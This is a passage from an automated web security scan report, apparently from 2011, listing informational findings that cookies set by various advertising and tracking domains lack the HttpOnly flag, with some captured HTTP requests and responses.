P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/7e0e346171a4d3507190678e09366eb4.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

13.101. http://d.adroll.com/view/7e0e346171a4d3507190678e09366eb4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/view/7e0e346171a4d3507190678e09366eb4

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /view/7e0e346171a4d3507190678e09366eb4 HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984779&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966778417&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966778450&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=785162123&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=1095&xpc=a0nyvi7KDh&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=d10276ea02f90b643e343970f448660f

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 13 Jun 2011 12:06:23 GMT
Connection: keep-alive
Set-Cookie: __adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/i/blank.gif
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

13.102. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/44/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3598886902647137246; Domain=.audienceiq.com; Expires=Sat, 10-Dec-2011 11:02:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.103. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/73/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3598886902647137246; Domain=.audienceiq.com; Expires=Sat, 10-Dec-2011 11:02:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.104. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3598886902647137246; Domain=.audienceiq.com; Expires=Sat, 10-Dec-2011 11:02:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.105. http://d.chango.com/collector/admeldpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.chango.com
Path:	/collector/admeldpixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 10 Jun 2021 11:21:55 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collector/admeldpixel?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4

Response

13.106. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.mediabrandsww.com
Path:	/r/dm/mkt/3/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=2614175914018475511; Domain=.mediabrandsww.com; Expires=Sat, 10-Dec-2011 11:02:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.107. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.p-td.com
Path:	/r/dm/mkt/4/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=8496530639253255806; Domain=.p-td.com; Expires=Sat, 10-Dec-2011 11:02:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.108. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.turn.com
Path:	/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:21 GMT; Path=/
uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:21 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.109. http://d.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

90514-B90519=0|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.110. http://d.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

84218-B84223=0|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.111. http://d1.openx.org/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=62614e7a17a25044ace97fcfa762d977; expires=Tue, 12-Jun-2012 11:26:18 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=365173&campaignid=175796&zoneid=129716&loc=1&referer=http%3A%2F%2Fwww.twackle.com%2F&cb=2b33dddc51&r_id=a2634e1a778c5cf5b2e87315ffc71c58&r_ts=lmq7ha HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.twackle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OACBLOCK=86574.1305468109; OACCAP=86574.1; OAID=62614e7a17a25044ace97fcfa762d977

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:26:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=62614e7a17a25044ace97fcfa762d977; expires=Tue, 12-Jun-2012 11:26:18 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.112. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:06:54 GMT;path=/;domain=.zedo.com;
FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:06:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=118
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:06:54 GMT
Content-Length: 2378
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...

13.113. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:01 GMT;path=/;domain=.zedo.com;
FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:01 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=112
Expires: Mon, 13 Jun 2011 11:08:53 GMT
Date: Mon, 13 Jun 2011 11:07:01 GMT
Content-Length: 2378
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...

13.114. http://d7.zedo.com/bar/v16-407/d3/jsc/gl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

FFgeo=2241452;expires=Tue, 12 Jun 2012 11:02:07 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.115. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ZFFAbh=879B826,20|120_879#365;expires=Tue, 12 Jun 2012 11:02:20 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.116. http://gdyn.nba.com/1.1/1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gdyn.nba.com
Path:	/1.1/1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

adDEmas=R00&broadband&softlayer.com&0&usa&523&05672&46&09&T1&M1&7029&; expires=Thu, 16 Jun 2011 14:01:03 GMT; domain=.nba.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.117. http://glam.grapeshot.co.uk/main/redirect.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://glam.grapeshot.co.uk
Path:	/main/redirect.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=1207876142; Path=/; Domain=.grapeshot.co.uk; Max-Age=31536000; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.118. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289; domain=pubmatic.com; expires=Mon, 26-May-2014 20:29:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.119. http://img137.imageshack.us/img137/4291/d5zee1.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img137.imageshack.us
Path:	/img137/4291/d5zee1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

is_uuid=d2e0c4806ee147ad905d441bff86fb6f; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.120. http://img690.imageshack.us/img690/7868/umadbroz.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img690.imageshack.us
Path:	/img690/7868/umadbroz.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

is_uuid=80ac3f4f12974b329cddbd7205e076f3; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.121. http://img851.imageshack.us/img851/8021/f7e22bda31624279b2e3f96.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img851.imageshack.us
Path:	/img851/8021/f7e22bda31624279b2e3f96.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

is_uuid=3690891069e54cd1ad556a2d2b660af4; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.122. http://imp.constantcontact.com/imp/cmp.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.constantcontact.com
Path:	/imp/cmp.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

impcc="IMP_14302119028291151=21766357|IMP_14302119028205613=21799456|IMP_14302119028205613=21799456|IMP_%3Cplacementid/%3E=21776370|IMP_14302119028337130=21775459|"; expires=Sun, 11-Sep-2011 12:16:42 GMT; path=/; domain=.constantcontact.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.123. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

udm_0=MLv3NzMJZjpn3tvXN5oCW6CTkwctQrAqXr4DyB/E++0lrZBz0XEqsdq/oLkcyD1HB535ecH2yQk8aXHAMOJs+2n+rxyycgR1MKWlhAgxfS3iSrgAs2jpe+yvn8K2rxozalguXRbMHL1Xj0tc//rI4kc7qGS/eDlhXRyox/8cF3uA+CrH0aRzrpciC6E5la1vQpLqPPunsYUn/u3AT+p36gLGc+SA5z/ryJK9/Lfn0bClh2vlrtBAzuZujVJMiKWDlaqxnMt+wg0Jw3lGCxNfWFbPJFZL1lKYNzXADwpgINcAOlL0r2FeKDYHge/rbscRTiZElGwFimOI11JRk0KklHrGCNiy26N8IhhTg2d/1v4vKGw9kYA9cE9B7rEq5akAFx+4/I5CjjIdhSJqqNA+OleQZ7fR/OWLFZ4AAD7HeRUnfiE8B1nXx1a5s7ylk4i1PgGL2Zab/y6UPgdZhTF/KD1yRVSz5gNQ+z7aZEKA8CKuYPMoT+Tkf1lWpBY+MKtaGNSFt76vzw7dxpBqf9fV4a1O/mlnH34bm15MqeWDpsKusAedE02istIFaC5/UxHUbLUSdP8x9dEUpVLKXrP8SZWv2zoryuV+qPQyII355Ntg+tfY/KzBWMuBUdc4ibR3EofEeFdvCEB012oNMa/Hnhjxvn+wWGlPXXy/9sgUt5O8/ytF7yiVr3R9PUTG49A+48Cx+SJbt/zwaM/ej9Lgel9YlJ5ko/7YzqPpG9+wRugmdqyGiKiRwCQqX7wNDyk7qKQs/kfG24bBIDhcB4aHnoin/3aoPW1zJJGJ/ibTimX8T/1YGkKApW2CWoG3arEGma7zn0LNQgmKLfCkiypAQnXIgQ7T8F2cCEfDA22ug/LibefoTAuMLTQgGjesCPdbNrwfnxuoaGP9GNAYzLF0//YJigvUNpcPG27VYw1qyWwoxnJ9q5OTOoRCa3MezIUW6npAkKMdyaL5jK8GDnT/fBycyjRwWINB3wcR4MiH14bRLdeTdXZUICfcViDmdmEqrHNdbCGDzq84XAH9e0pTSUCU+aOcvgZA9rEbArxlNNffMDswsC2g/Uhusot+1v7+gDJjTa/Ztj+4Zq6KW9y9XPeGG+9QUI/aZaqMFx7PMX6UPD1534KvbEeYfe2CojNDeFG6iVcUKjF5PeGLrloX2YixITiGVvkKWSx13RxyF/0Cnlnkewfn18srhgSd/xEN9UNu8F6IEABtK2r0Vu4ryeFrfjFVdC1ZGR9BC4a/lX1cgQnaiLo0Zkyx1pATonDkg3Jx4sUThFEX0LhkAN+C/v+2BtkiEUf7wiGqAGE7Lfb8scj6F1f2OQ1yNJsp86R0g/mnstNh8Zn72QsN0xHDyr5BP27t+1q1QV3n/lXD8jsppi2TEBvRWtVgKgJJF1OxRv3P+0/t1Jc1A7fNTtde5mnZkj/GfpB6KkYhBTIxOySOOwmnTFvbQPO6O0jIgSA419dsfLPK0nVH2RJ3KC/IPOdPz7QSH4IAbhJ5NEoQf28ctm+FdwTR7L53m49f54hp9uWL0PfS/V/YCt4Qj5kQrR/9/8QBUF+WRCDYYbIhJrHdLroy/d5ne0X3zGbhGKAzI8w7voTqtTGzBGLgJmtFoQdjOiGG9Tj6N4gj/Oxabtr0rWazwXS5TzjG/UYbfMobryzEnZVdDVbrmwZAJh/h8HMvesrk5jWgk8xvy60mxPuVSK5VLx5Yhz5C0riAFQ4usH3bjTnUF8ipaBWYatjwQl9p4xFkzA7gqA==; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:22:34 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.124. http://load.exelator.com/load/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://load.exelator.com
Path:	/load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

xltl=eJxdjTsLwkAQhP%252FL9oG73b3XWgUVUTSKL8RGLnc5FMtgJf53Y0q7mWHmmyhG3r2QwGk5g8mgUIBjKay0aYMnbAMVduxyijo75Bzir6e1wOuRbwdUvGym49QK%252BNKajmKqPEWqOKVY%252BRxd5Qp23AVr2af%252FeT27%252FCJ0AtN6fpjvat9cFqvzpr%252BX1xO3%252Fenorv34ILDeD18P0RZZMfp%252F1K4Z6UGAePDaIBtUyhIpb2Dy%252BQKAGD%252Be; expires=Tue, 11-Oct-2011 11:08:21 GMT; path=/; domain=.exelator.com
TFF=eJydlb1uxSAMhd8lT4AdwJgseYyuGTJU6tZuV%252FfdC1FCEn5akwGB0PnAxzZi8SP717cH9AMoPSOomZlxmBaP%252FvXpYQrDKgqTikvDbnoXeoj6MdPjPq4cJUxGhFnpuxL1ruLy7PVj%252FVp%252B1qFBgK7YwBCPMlC1nYKJy1JvchOHAcg4SpiMCHu5bThMjJWYYDu8WjrUp54q%252BjyilCzKOEqYlNhuIpqVqme30OuLHgmx2STwH9lsyL9IYB4Jn5A6kEp%252B5z0vRRcJOSvlKGEyIsxEHTFtrS2t8V3f5f3C9Xjfsa4sGxsQjDe5ofEOTy5sHf2wcwCOND8iaz0oIi0rg1pM3l0%252B5fL6Sbm8fm3OXHKDjq2TFyRH5S4pkTIi%252Fii2IxNbS0L1xZx%252FVF0vzjglTEa8fwGkIANj; expires=Tue, 11-Oct-2011 11:08:21 GMT; path=/; domain=.exelator.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.125. http://m.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

66281-B66290=3|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.126. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lyc=BAAAAAQKuvBNACAAAVBbIASgAAalTAAA7+znYBcBaFagFCAABqFFAAD58fVgFwG0RyAQoAAASqAHQADgBRcBAAA=; domain=.fastclick.net; path=/; expires=Wed, 12-Jun-2013 11:18:20 GMT
pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Wed, 12-Jun-2013 11:18:20 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.127. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.photobucket.com
Path:	/image/recent/Smirk_Dog/GIFS/MacSigDance.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

flash=deleted; expires=Sun, 13-Jun-2010 11:02:11 GMT; path=/; domain=.photobucket.com
daily=referer%3Dwww.mavsmoneyball.com; expires=Tue, 14-Jun-2011 11:02:14 GMT; path=/; domain=.photobucket.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.128. http://my.yahoo.com/e/df previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.yahoo.com
Path:	/e/df

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVkbjZxNWQ2dDA3OGIiO3M6MjoibXQiO2k6MTMwNzk2MzQ1Njt9; expires=Thu, 13-Jun-2013 11:10:56 GMT; path=/; domain=my.yahoo.com
U_mtupes=deleted; expires=Sun, 13-Jun-2010 11:10:56 GMT; path=/; domain=my.yahoo.com
